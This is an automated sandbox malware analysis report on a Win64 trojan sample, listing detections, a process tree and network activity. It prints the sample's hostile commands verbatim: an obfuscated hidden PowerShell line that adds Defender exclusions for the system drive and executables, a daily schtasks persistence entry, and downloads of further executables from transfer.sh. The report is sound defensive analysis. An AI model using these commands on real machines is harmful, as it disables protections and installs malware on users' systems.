Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe

Overview

General Information

Sample Name:SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe
Analysis ID:865491
MD5:e1aa70e7ef25fdadd52160e9b9f37b37
SHA1:7b1538dbde2ad906db1a03dd62604c787adb6579
SHA256:eb9c9eb6572805d03da8b824b1d179301cded34e9c9a71dd1573daa0b2978953
Tags:exe
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Suspicious powershell command line found
May check the online IP address of the machine
Adds a directory exclusion to Windows Defender
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Drops PE files
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe (PID: 7004 cmdline: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe MD5: E1AA70E7EF25FDADD52160E9B9F37B37)
    • powershell.exe (PID: 1840 cmdline: powershell "Start-Process <#uvbdteguxxcvxgbwugr#> powershell <#eusqdgkfiwwiaydnu#> -Verb <#jdnlkeczqufwm#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force' MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 3044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 5032 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force MD5: 95000560239032BC68B4C2FDFCDEF913)
        • conhost.exe (PID: 3592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • MonDisc.exe (PID: 6520 cmdline: C:\Users\user\AppData\Roaming\MonDisc.exe MD5: EEF2E49FD27D42237FFB929E1A39FC2D)
      • powershell.exe (PID: 2820 cmdline: powershell "Start-Process <#uhyyubuhpbatllasmvhe#> powershell <#uhyyubuhpbatllasmvhe#> -Verb <#uhyyubuhpbatllasmvhe#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force' MD5: 95000560239032BC68B4C2FDFCDEF913)
        • conhost.exe (PID: 5036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powershell.exe (PID: 4924 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force MD5: 95000560239032BC68B4C2FDFCDEF913)
          • conhost.exe (PID: 4920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • schtasks.exe (PID: 5092 cmdline: schtasks /create /sc daily /st 12:00 /f /tn "MonDisc" /tr "C:\Users\user\AppData\Roaming\MonDisc.exe" MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
        • conhost.exe (PID: 2816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • LoWin64.exe (PID: 4780 cmdline: C:\Users\user\AppData\Roaming\Prtct\Updates\SysCare\LoWin64.exe MD5: 79F329EA2EC0C1BAED4F262F79B48BA5)
  • MonDisc.exe (PID: 4936 cmdline: C:\Users\user\AppData\Roaming\MonDisc.exe MD5: EEF2E49FD27D42237FFB929E1A39FC2D)
  • MonDisc.exe (PID: 5720 cmdline: "C:\Users\user\AppData\Roaming\MonDisc.exe" MD5: EEF2E49FD27D42237FFB929E1A39FC2D)
    • powershell.exe (PID: 1500 cmdline: powershell "Start-Process <#kdqbcogdyphj#> powershell <#kdqbcogdyphj#> -Verb <#kdqbcogdyphj#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force' MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 1296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 3104 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force MD5: 95000560239032BC68B4C2FDFCDEF913)
        • conhost.exe (PID: 2100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 3388 cmdline: schtasks /create /sc daily /st 12:00 /f /tn "MonDisc" /tr "C:\Users\user\AppData\Roaming\MonDisc.exe" MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
      • conhost.exe (PID: 3932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • MonDisc.exe (PID: 5988 cmdline: "C:\Users\user\AppData\Roaming\MonDisc.exe" MD5: EEF2E49FD27D42237FFB929E1A39FC2D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeReversingLabs: Detection: 24%
Source: SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeVirustotal: Detection: 26%Perma Link
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Roaming\MonDisc.exeAvira: detection malicious, Label: HEUR/AGEN.1315574
Source: C:\Users\user\AppData\Roaming\Prtct\Updates\SysCare\LoWin64.exeAvira: detection malicious, Label: HEUR/AGEN.1315574
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\MonDisc.exeReversingLabs: Detection: 54%
Source: C:\Users\user\AppData\Roaming\MonDisc.exeVirustotal: Detection: 55%Perma Link
Source: C:\Users\user\AppData\Roaming\Prtct\Updates\SysCare\LoWin64.exeReversingLabs: Detection: 48%
Source: C:\Users\user\AppData\Roaming\Prtct\Updates\SysCare\LoWin64.exeVirustotal: Detection: 53%Perma Link
Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49702 version: TLS 1.2
Source: SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Networking

barindex
May check the online IP address of the machine
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeDNS query: name: ip-api.com
Source: C:\Users\user\AppData\Roaming\MonDisc.exeDNS query: name: ip-api.com
Source: C:\Users\user\AppData\Roaming\MonDisc.exeDNS query: name: ip-api.com
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
Source: unknownTCP traffic detected without corresponding DNS query: 185.159.130.81
Source: unknownTCP traffic detected without corresponding DNS query: 185.159.130.81
Source: unknownTCP traffic detected without corresponding DNS query: 185.159.130.81
Source: unknownTCP traffic detected without corresponding DNS query: 185.159.129.168
Source: unknownTCP traffic detected without corresponding DNS query: 185.159.129.168
Source: unknownTCP traffic detected without corresponding DNS query: 185.159.129.168
Source: unknownTCP traffic detected without corresponding DNS query: 185.159.129.168
Source: unknownTCP traffic detected without corresponding DNS query: 185.159.129.168
Source: unknownTCP traffic detected without corresponding DNS query: 185.159.130.81
Source: unknownTCP traffic detected without corresponding DNS query: 185.159.130.81
Source: unknownTCP traffic detected without corresponding DNS query: 185.159.130.81
Source: unknownTCP traffic detected without corresponding DNS query: 185.159.129.168
Source: unknownTCP traffic detected without corresponding DNS query: 185.159.129.168
Source: unknownTCP traffic detected without corresponding DNS query: 185.159.129.168
Source: unknownTCP traffic detected without corresponding DNS query: 185.159.129.168
Source: unknownTCP traffic detected without corresponding DNS query: 185.159.129.168
Source: unknownTCP traffic detected without corresponding DNS query: 185.159.129.168
Source: unknownTCP traffic detected without corresponding DNS query: 185.159.130.81
Source: unknownTCP traffic detected without corresponding DNS query: 185.159.130.81
Source: unknownTCP traffic detected without corresponding DNS query: 185.159.129.168
Source: unknownTCP traffic detected without corresponding DNS query: 185.159.130.81
Source: unknownTCP traffic detected without corresponding DNS query: 185.159.129.168
Source: unknownTCP traffic detected without corresponding DNS query: 185.159.129.168
Source: unknownTCP traffic detected without corresponding DNS query: 185.159.129.168
Source: unknownTCP traffic detected without corresponding DNS query: 185.159.129.168
Source: unknownTCP traffic detected without corresponding DNS query: 185.149.146.118
Source: unknownTCP traffic detected without corresponding DNS query: 185.149.146.118
Source: unknownTCP traffic detected without corresponding DNS query: 185.149.146.118
Source: unknownTCP traffic detected without corresponding DNS query: 185.149.146.118
Source: unknownTCP traffic detected without corresponding DNS query: 185.149.146.118
Source: unknownTCP traffic detected without corresponding DNS query: 185.149.146.118
Source: unknownTCP traffic detected without corresponding DNS query: 185.159.129.168
Source: unknownTCP traffic detected without corresponding DNS query: 185.159.130.81
Source: unknownTCP traffic detected without corresponding DNS query: 185.159.130.81
Source: unknownTCP traffic detected without corresponding DNS query: 185.159.130.81
Source: unknownTCP traffic detected without corresponding DNS query: 185.159.129.168
Source: unknownTCP traffic detected without corresponding DNS query: 185.159.129.168
Source: unknownTCP traffic detected without corresponding DNS query: 185.159.129.168
Source: unknownTCP traffic detected without corresponding DNS query: 185.159.129.168
Source: unknownTCP traffic detected without corresponding DNS query: 185.159.129.168
Source: powershell.exe, 0000000A.00000002.413976982.00000280F3135000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
Source: powershell.exe, 0000000A.00000002.413976982.00000280F3135000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micr0qv
Source: powershell.exe, 0000000A.00000002.407751595.00000280901AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.335874008.000002808158D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.407751595.0000028090078000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000A.00000002.335874008.00000280813B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.420208424.00000280F5034000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000A.00000002.335874008.0000028080001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000A.00000002.335874008.0000028080EE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000000A.00000002.335874008.00000280813B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.420208424.00000280F5034000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000A.00000002.407751595.0000028090078000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000A.00000002.407751595.0000028090078000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000A.00000002.407751595.0000028090078000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000A.00000002.335874008.00000280813B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.420208424.00000280F5034000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000A.00000002.407751595.00000280901AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.335874008.000002808158D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.407751595.0000028090078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.335874008.000002808028D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000000A.00000002.335874008.0000028080EE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 0000000A.00000002.335874008.0000028080EE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
Source: powershell.exe, 0000000A.00000002.335874008.0000028080EE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgformat.ps1xmlagement.dll2040.missionsand
Source: unknownDNS traffic detected: queries for: ip-api.com
Source: global trafficHTTP traffic detected: GET /get/1PRjTr/clip.exe HTTP/1.1User-Agent: MonkeyHost: transfer.shConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /get/1h9hjM/LoWin64.exe HTTP/1.1User-Agent: MonkeyHost: transfer.shConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /json/?fields=query,status,countryCode,city,timezone HTTP/1.1Content-Type: application/jsonUser-Agent: MonkeyHost: ip-api.com
Source: global trafficHTTP traffic detected: GET /get/1PRjTr/clip.exe HTTP/1.1Content-Type: application/jsonUser-Agent: MonkeyHost: transfer.sh
Source: global trafficHTTP traffic detected: GET /json/?fields=query,status,countryCode,city,timezone HTTP/1.1Content-Type: application/jsonUser-Agent: CatHost: ip-api.com
Source: global trafficHTTP traffic detected: GET /get/1h9hjM/LoWin64.exe HTTP/1.1Content-Type: application/jsonUser-Agent: MonkeyHost: transfer.sh
Source: global trafficHTTP traffic detected: GET /json/?fields=query,status,countryCode,city,timezone HTTP/1.1Content-Type: application/jsonUser-Agent: CatHost: ip-api.com
Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49702 version: TLS 1.2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFBAC4D39E112_2_00007FFBAC4D39E1
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_3_00007FF6290C466B15_3_00007FF6290C466B
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_3_00007FF6290C7A6A15_3_00007FF6290C7A6A
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F8EB415_2_00007FF62C8F8EB4
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C90C12015_2_00007FF62C90C120
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F510115_2_00007FF62C8F5101
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F56BC15_2_00007FF62C8F56BC
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F81BD15_2_00007FF62C8F81BD
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F63BA15_2_00007FF62C8F63BA
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C910F3015_2_00007FF62C910F30
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C949F1015_2_00007FF62C949F10
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C93BFC015_2_00007FF62C93BFC0
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F8F3E15_2_00007FF62C8F8F3E
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F512F15_2_00007FF62C8F512F
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F511715_2_00007FF62C8F5117
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C93796015_2_00007FF62C937960
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C99293815_2_00007FF62C992938
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C992BBC15_2_00007FF62C992BBC
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C993BBC15_2_00007FF62C993BBC
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C9935E815_2_00007FF62C9935E8
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C99269C15_2_00007FF62C99269C
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C93D82015_2_00007FF62C93D820
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C9938DC15_2_00007FF62C9938DC
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C95592015_2_00007FF62C955920
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C91A86015_2_00007FF62C91A860
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C90A85015_2_00007FF62C90A850
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F820215_2_00007FF62C8F8202
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C91223015_2_00007FF62C912230
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C9B521415_2_00007FF62C9B5214
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F516F15_2_00007FF62C8F516F
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C9AB14815_2_00007FF62C9AB148
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F519115_2_00007FF62C8F5191
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F517B15_2_00007FF62C8F517B
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F82C715_2_00007FF62C8F82C7
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F832A15_2_00007FF62C8F832A
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C99330815_2_00007FF62C993308
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C91231015_2_00007FF62C912310
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C9AB26415_2_00007FF62C9AB264
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C93624015_2_00007FF62C936240
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F825C15_2_00007FF62C8F825C
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F82A915_2_00007FF62C8F82A9
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C9503F015_2_00007FF62C9503F0
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C99241815_2_00007FF62C992418
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F834D15_2_00007FF62C8F834D
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C9AB38415_2_00007FF62C9AB384
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C9AB4A015_2_00007FF62C9AB4A0
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C90F49015_2_00007FF62C90F490
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_3_00007FF605B873EA22_3_00007FF605B873EA
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_3_00007FF605B8CCC322_3_00007FF605B8CCC3
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_3_00007FF605B8658922_3_00007FF605B86589
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_3_00007FF605B8D03622_3_00007FF605B8D036
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_3_00007FF605B8BD3D22_3_00007FF605B8BD3D
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F8EB422_2_00007FF62C8F8EB4
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F510122_2_00007FF62C8F5101
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F56BC22_2_00007FF62C8F56BC
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F81BD22_2_00007FF62C8F81BD
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F63BA22_2_00007FF62C8F63BA
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C910F3022_2_00007FF62C910F30
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C949F1022_2_00007FF62C949F10
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C93BFC022_2_00007FF62C93BFC0
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F8F3E22_2_00007FF62C8F8F3E
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C90C12022_2_00007FF62C90C120
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F512F22_2_00007FF62C8F512F
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F511722_2_00007FF62C8F5117
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C9B007022_2_00007FF62C9B0070
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C93796022_2_00007FF62C937960
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C99293822_2_00007FF62C992938
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C992BBC22_2_00007FF62C992BBC
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C993BBC22_2_00007FF62C993BBC
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C9935E822_2_00007FF62C9935E8
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C99269C22_2_00007FF62C99269C
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C93D82022_2_00007FF62C93D820
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C9938DC22_2_00007FF62C9938DC
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C95592022_2_00007FF62C955920
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C91A86022_2_00007FF62C91A860
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C90A85022_2_00007FF62C90A850
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C9D18AC22_2_00007FF62C9D18AC
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F820222_2_00007FF62C8F8202
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C91223022_2_00007FF62C912230
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C9B521422_2_00007FF62C9B5214
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F516F22_2_00007FF62C8F516F
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C9AB14822_2_00007FF62C9AB148
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F519122_2_00007FF62C8F5191
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F517B22_2_00007FF62C8F517B
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F82C722_2_00007FF62C8F82C7
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F832A22_2_00007FF62C8F832A
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C99330822_2_00007FF62C993308
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C91231022_2_00007FF62C912310
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C9AB26422_2_00007FF62C9AB264
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C93624022_2_00007FF62C936240
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F825C22_2_00007FF62C8F825C
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F82A922_2_00007FF62C8F82A9
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C9503F022_2_00007FF62C9503F0
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C99241822_2_00007FF62C992418
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F834D22_2_00007FF62C8F834D
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C9AB38422_2_00007FF62C9AB384
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C9AB4A022_2_00007FF62C9AB4A0
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C90F49022_2_00007FF62C90F490
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_3_00007FF605B8BCAA22_3_00007FF605B8BCAA
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: String function: 00007FF62C8FBE00 appears 50 times
Source: SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeReversingLabs: Detection: 24%
Source: SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeVirustotal: Detection: 26%
Source: SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell "Start-Process <#uvbdteguxxcvxgbwugr#> powershell <#eusqdgkfiwwiaydnu#> -Verb <#jdnlkeczqufwm#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeProcess created: C:\Users\user\AppData\Roaming\MonDisc.exe C:\Users\user\AppData\Roaming\MonDisc.exe
